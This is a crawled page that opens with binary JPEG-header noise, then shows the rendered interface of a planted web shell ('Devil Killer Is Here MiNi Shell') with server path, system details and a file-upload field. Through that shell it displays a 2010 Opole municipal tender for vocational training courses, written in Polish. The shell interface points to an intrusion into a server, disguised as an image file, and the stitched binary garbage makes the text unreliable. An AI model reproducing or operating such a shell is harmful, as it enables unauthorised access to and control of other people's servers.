JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100922/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100922/302240-N-2010.html

<p class="kh_header"><b>Opole: Organizacja i przeprowadzenie kursów i szkoleń zawodowych dla klientów Miejskiego Ośrodka Pomocy Rodzinie w Opolu.</b><br>
<b>Numer ogłoszenia: 302240 - 2010; data zamieszczenia: 22.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto  Opole , Rynek-Ratusz, 45-015 Opole, woj. opolskie, tel. 77 451 19 21, 77 451 19 22, faks 77 454 98 44.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie kursów i szkoleń zawodowych dla klientów Miejskiego Ośrodka Pomocy Rodzinie w Opolu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie kursów i szkoleń zawodowych dla 89 uczestników Programu aktywizacji społeczno - zawodowej bezrobotnych i nieaktywnych zawodowo klientów Miejskiego Ośrodka Pomocy Rodzinie w Opolu, pn.: MOJA PRACA - MOJA PRZYSZŁOŚĆ realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.Przedmiot zamówienia realizowany będzie w częściach:
CZĘŚĆ  I   Kurs-szkolenie: Prawo jazdy kat. B  dla  14  osób
CZĘŚĆ II   Kurs-szkolenie: Prawo jazdy kat. D  dla 2 osób (osoby posiadają kat. B i C).
CZĘŚĆ III   Kurs-szkolenie: Prawo jazdy kat. C+E  dla 1 osoby (osoba posiada kat. B i C).
CZĘŚĆ IV.   Kurs-szkolenie: Pracownik ochrony osób i mienia - licencja I stopnia dla 5 osób
CZĘŚĆ V.   Kurs-szkolenie: Kucharz (pomocnik kucharza) dla  3 osób.
CZĘŚĆ VI.  Kurs-szkolenie: Sprzedawca oraz obsługa kas fiskalnych i terminala płatniczego dla 9 osób.
CZĘŚĆ VII. Kurs-szkolenie: Magazynier oraz obsługa kas fiskalnych, terminala płatniczego i obsługi  wózków widłowych dla 10 osób.
CZĘŚĆ VIII. Kurs-szkolenie: Opiekun osób zależnych (starszych, niepełnosprawnych oraz dzieci) z elementami języka niemieckiego  dla  13 osób.
CZĘŚĆ IX.  Kurs-szkolenie: Operator wózków jezdniowych dla  5 osób.
CZĘŚĆ X.   Kurs-szkolenie: Operator koparko - ładowarki  dla  6  osób.
CZĘŚĆ XI.  Kurs-szkolenie: Betoniarz - zbrojarz  dla  2  osób.
CZĘŚĆ XII. Kurs-szkolenie: Księgowość komputerowa z modułem kadry - płace  dla  7  osób.
CZĘŚĆ XIII. Kurs-szkolenie: Grafik komputerowy dla 5  osób.
CZĘŚĆ XIV. Kurs-szkolenie: Bukieciarz - florysta dla 2 osób.
CZĘŚĆ XV.  Kurs-szkolenie: Fryzjer dla 3 osób.
CZĘŚĆ XVI. Kurs-szkolenie: Wizażysta oraz stylizacja paznokci dla 2 osób.
Z uwagi na możliwość rezygnacji uczestnika projektu lub zmiany kursu-szkolenia zawodowego, Zamawiający w każdym zadaniu,  zastrzega sobie możliwość zmiany ilości uczestników.
Lista  uczestników każdego kursu-szkolenia będzie przekazana Wykonawcy na 5 dni przed terminem jego rozpoczęcia. 

Wszystkie kursy-szkolenia odbędą się na terenie miasta Opola lub jego okolicy - możliwy dojazd do 10 km od granic miasta Opola.

Zajęcia teoretyczne i praktyczne w ramach każdego kursu-szkolenia  winny odbywać się w dniach roboczych ( sporadycznie - w soboty), przez 4 - 8 godzin  dziennie, w godzinach: od 8,00  do 18,00, (sporadycznie - do godz. 20,00).

II. Przy organizacji i realizacji kursów i szkoleń  wszystkich części zamówienia Wykonawca usług obowiązany będzie do:
1.	Zapewnienia  odpowiednio wyposażonych sal wykładowych oraz  pomieszczeń i terenu do praktycznej  nauki zawodu (w tym: maszyny,  narzędzia, materiały, itp.).
      2.   Zapewnienia dojazdu na kurs-szkolenie, o ile będzie się on odbywał poza granicami miasta Opola.
      3.   Zapewnienia warunków pracy zgodnie z przepisami bezpieczeństwa i higieny pracy  
      4.   Ubezpieczenia osób biorących udział w kursach-szkoleniach od następstw nieszczęśliwych 
      wypadków powstałych w związku z kursem-szkoleniem oraz w drodze do miejsca szkolenia- 
      kursu i z powrotem,
5.	Przeprowadzenia niezbędnych badań lekarskich, psychotechnicznych kwalifikujących do odbycia kursu-szkolenia oraz wykonywania zawodu, a także wystawienie książeczek zdrowia do celów sanitarnych na koszt własny,   który należy uwzględnić jako składnik ceny oferowanej przez jednostkę szkolącą za  wykonanie zamówienia. Wykonawca przekaże Zamawiającemu kopie zaświadczeń lekarskich. 
6.	Zapewnienia osób bezpośrednio uczestniczących w realizacji zamówienia (nauczycieli, wykładowców) z odpowiednim wykształceniem, umiejętnościami i doświadczeniem dostosowanym do tematyki kursów- szkoleń.
7.	Zapewnienia każdemu uczestnikowi kursu-szkolenia cateringu w postaci:
-  śniadania lub kolacji: kanapka - bułka podłużna lub tradycyjna z serem lub wędliną, pastą z dodatkiem    warzyw, herbata ( urozmaicone),
- serwisu kawowego podczas przerwy w zajęciach: kawa, herbata, soki owocowe, woda mineralna, kruche ciasteczka, wafelki, cukierki, itp.
-   ciepłego posiłku: drugie danie - ziemniaki (lub ryż, makaron, kluski, itp.), mięso lub ryby, 
     surówka, sosy -  w pojemnikach  jednorazowych ( urozmaicone ).
8.	Opracowania szczegółowych programów i harmonogramów kursów -szkoleń. Szczegółowe programy  i harmonogramy zajęć dla każdego kursu zostaną opracowane przez  Wykonawcę i przedstawione Zamawiającemu do akceptacji w terminie do 5 dni przed terminem  rozpoczęcia każdego kursu- szkolenia. 
9.	Przekazania na własność każdemu uczestnikowi kursu-szkolenia materiałów szkoleniowych i pomocy dydaktycznych (podręczniki, skrypty, itp.) oraz zapewnienia wymaganej odzieży ochronnej i roboczej.
10.	Prowadzenia dokumentacji: listy obecności uczestników na zajęciach,  dziennika zajęć i przekazania ich Zamawiającemu po wykonaniu zamówienia.
11.	Bieżącego informowania Zamawiającego o nieusprawiedliwionej nieobecności na zajęciach w ramach kursu-szkolenia,  nie zgłoszeniu się na zajęcia lub rezygnacji uczestnika z kursu-szkolenia w trakcie jego trwania.
12.	Przeprowadzenia kursów-szkoleń zgodnie z Krajowymi Standardami Kwalifikacji Zawodowych.
13.	Realizacji przedmiotu umowy z należytą starannością oraz czuwania nad prawidłową realizacją umowy.
14.	Indywidualizacji kształcenia poprzez prowadzenie systematycznej oceny postępów poszczególnych uczestników i zwiększenia pomocy wobec osób mających   trudności   w procesie nauczania.
15.	Wydania uczestnikom zaświadczeń o ukończeniu kursu-szkolenia w języku polskim oraz j. angielskim lub niemieckim (do wyboru przez uczestnika), i przekazania Zamawiającemu ich kserokopii poświadczonych za zgodność przez Wykonawcę.
16.	Prowadzenie rejestru wydanych zaświadczeń.
17.	Zarejestrowania kursów-szkoleń w internetowej bazie ofert szkoleniowych www.inwestycjawkadry.pl, www.baza.pokl.opole.pl i aktualizacji informacji o każdym szkoleniu nie rzadziej niż raz w miesiącu.
18.	Promocji usługi w ramach projektu  Program aktywizacji społeczno zawodowej bezrobotnych oraz  nieaktywnych zawodowo klientów Miejskiego Ośrodka Pomocy Rodzinie w Opolu pn. MOJA PRACA -  MOJA PRZYSZŁOŚĆ. Promocja obejmować będzie min.: umieszczanie obowiązujących logotypów  na zaświadczeniach o ukończeniu warsztatów oraz innych dokumentach, zgodnie z Wytycznymi   dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki ( wytyczne  dostępne są na stronie www.efs.gov.pl) łącznie z podpisem: Projekt współfinansowany ze środków  Unii Europejskiej w  ramach Europejskiego Funduszu Społecznego,   a także oznaczanie pomieszczeń,  w których będą odbywały się zajęcia  poprzez umieszczenie informacji o współfinasowaniu  w sali wykładowej w miejscu widocznym dla uczestników kursów-szkoleń lub przed wejściem do sali.
19.	Przeprowadzenia ankiet oceny kursów-szkoleń i wykładowców oraz  efektywności kursów-
      szkoleń.
20.	Dostarczenie pisemnego sprawozdania z przeprowadzonych kursów-szkoleń zawierającego 
informację o  obecnościach na zajęciach, rezygnacji z zajęć i uzyskanych kwalifikacjach przez wszystkich  uczestników kursu-szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia prawa Wykonawcy do ubiegania się o zamówienie publiczne określonego w art. 22 ust.1 Prawa, Zamawiający na podstawie art. 44 Prawa żąda złożenia:
       -   oświadczenia o spełnianiu warunków udziału w postępowaniu. Oświadczenie należy złożyć według wzoru załączonego do niniejszej specyfikacji.
       -    wpis lub aktualizacja na 2010 r. w rejestrze instytucji szkoleniowych w Wojewódzkim   Urzędzie Pracy właściwym ze względu na siedzibę instytucji szkoleniowej.
Dokonanie oceny spełnienia warunków udziału w postępowaniu odbywać się będzie na podstawie złożonych w ofercie wykonawcy oświadczeń i dokumentów. Zamawiający sprawdzi kompletność dokumentów, a następnie dokona sprawdzenia spełnienia warunków według zasady spełnia/nie spełnia, co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku posiadania wiedzy i doświadczenia do wykonywania zamówienia zamawiający żąda złożenia oświadczenia w formie wykazu usług wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem do wykazu dokumentów potwierdzających ich należyte wykonanie.
Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże się wykonaniem  co najmniej 3 usług, polegających na zorganizowaniu i przeprowadzeniu kursów lub szkoleń zawodowych. 
W przypadku wykazania doświadczenia, które udostępni inny podmiot, Wykonawca do wykazu załącza pisemne zobowiązanie do udostępnienia tego doświadczenia wystawione przez podmiot udostępniający.   Wzór wykazu załączono do niniejszej specyfikacji.
Dokonanie oceny spełnienia warunków udziału w postępowaniu odbywać się będzie na podstawie złożonych w ofercie wykonawcy oświadczeń i dokumentów. Zamawiający sprawdzi kompletność dokumentów, a następnie dokona sprawdzenia spełnienia warunków według zasady spełnia/nie spełnia, co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmian postanowień zawartych w umowie w przypadku:

1.Zmiany przepisów prawnych mających wpływ na realizację umowy, a w szczególności na jej zakres i termin.
2. Zmiany przepisów prawnych mających wpływ na cenę umowy, a w szczególności zmiany podatku VAT, wprowadzenia akcyzy.
3. Zmiany wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej.
4. Zmiany umowy pomiędzy Zamawiającym a instytucjami nadzorującymi realizację projektu, w ramach którego realizowane jest zamówienie.
5. Wyniknięcia rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony.
6. Zmiany nazwy, adresu firmy, spowodowane zmianą formy organizacyjno - prawnej, przekształceniem lub połączeniem z inną firmą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Opola Wydział Inwestycji Miejskich Referat Przetargów i Zamówień Publicznych Opole, Pl. Wolności 7-8 pok. 118.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.09.2010 godzina 10:00, miejsce: Urząd Miasta Opola Wydział Inwestycji Miejskich Opole Pl. Wolności 7-8 pok. 117 b.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program aktywizacji społeczno-zawodowej bezrobotnych i nieaktywnych zawodowo klientów Miejskiego Ośrodka Pomocy Rodzinie w Opolu, pn. MOJA PRACA - MOJA PRZYSZŁOŚĆ realizowanego w ramach Programu Oeracyjnego Kapitał Ludzki, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs -szkolenie: Prawo jazdy kat. B dla 14 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca winien zapewnić:
-	szkolenie teoretyczne ( wykłady, pokazy, ćwiczenia)  -  30 godz.
-	szkolenie praktyczne  (pokaz i jazda samochodem)  -  30 godz. 
-	przeprowadzenie egzaminu wewnętrznego
-	1 egzamin państwowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs-szkolenie: Prawo jazdy kat. D dla 2 osób (osoby posiadają kat. B i C).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca winien zapewnić:
-	szkolenie teoretyczne ( wykłady, pokazy, ćwiczenia)  -  20 godz.
-	szkolenie praktyczne  (pokaz i jazda samochodem)  -  40 godz. 
-	przeprowadzenie egzaminu wewnętrznego
-	1 egzamin państwowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs-szkolenie: Prawo jazdy kat. C+E  dla 1 osoby (osoba posiada kat. B i C)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca winien zapewnić:
-	szkolenie teoretyczne ( wykłady, pokazy, ćwiczenia)  -  20 godz.
-	szkolenie praktyczne  (pokaz i jazda samochodem)  -  25 godz. 
-	przeprowadzenie egzaminu wewnętrznego
-	1 egzamin państwowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs-szkolenie: Pracownik ochrony osób i mienia - licencja I stopnia dla 5 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca winien zapewnić:
-	szkolenie teoretyczne i praktyczne w ilości 250 godzin obejmujące zagadnienia : ogólnoprawne, ochrony mienia, ochrony osób, wyszkolenie strzeleckie, techniki samoobrony i interwencyjne, udzielanie pierwszej pomocy, etyka pracownika ochrony, itp.
-	kurs winien przygotować uczestników do przystąpienia do egzaminu w celu uzyskania licencji pracownika ochrony I stopnia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs-szkolenie: Kucharz (pomocnik kucharza) dla  3 osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca winien zapewnić:
-	szkolenie teoretyczne obejmujące zagadnienia z zakresu bhp, ppoż., zasad  zdrowego żywienia, higieny, technologii gastronomicznej, towaroznawstwa  -  30 godz.
-	szkolenie praktyczne obejmujące wykonywanie pod nadzorem kucharza potraw i napojów z wykorzystaniem różnych technik i metod  -  90 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs-szkolenie: Sprzedawca oraz obsługa kas fiskalnych i terminala płatniczego dla 9 osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca winien zapewnić:
-	szkolenie teoretyczne i praktyczne  w ilości 180 godzin, obejmujące zagadnienia dotyczące m.in: bhp, form sprzedaży, obsługi klienta z wykorzystaniem aktywnych metod sprzedaży, etykę i kulturę sprzedaży, towaroznawstwa, marketingu i reklamy, fakturowania komputerowego, obsługi kas fiskalnych i terminali  płatniczych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kurs-szkolenie: Magazynier oraz obsługa kas fiskalnych, terminala płatniczego i obsługi  wózków widłowych dla 10 osób..</p>
